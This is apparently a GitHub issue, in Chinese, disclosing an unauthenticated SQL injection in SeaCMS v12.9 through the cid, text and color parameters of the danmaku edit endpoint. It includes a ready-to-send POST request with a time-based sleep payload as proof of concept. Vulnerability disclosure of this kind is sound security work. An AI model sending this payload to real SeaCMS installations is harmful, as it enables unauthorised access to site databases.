seacms-net / CMS

海洋cms程序发布
https://www.seacms.net
380 stars 25 forks source link

SeaCMS v12.9 未授权SQL注入漏洞 #17

Open pysnow1 opened 3 months ago

pysnow1 commented 3 months ago

总结

SeaCMS v12.9 存在未授权SQL注入漏洞,该漏洞源于/js/player/dmplayer/dmku/index.php?ac=edit处能够通过cid参数进行sql注入,从而导致数据库敏感信息泄露

漏洞介绍

image js/player/dmplayer/dmku/index.php处存在SQL注入,传入ac=edit能够调用$d->编辑弹幕($cid) image image 而在编辑_弹幕方法处没有进行过滤导致cid、text、color都能够引起sql注入

漏洞验证

image 延时3秒 image 延时6秒

POC

POST /js/player/dmplayer/dmku/index.php?ac=edit HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

cid=(select(1)from(select(sleep(6)))x)&text=1&color=1

影响

此漏洞允许未经身份验证的远程攻击者通过cid或text、color参数注入任意 SQL 命令,获取数据库敏感信息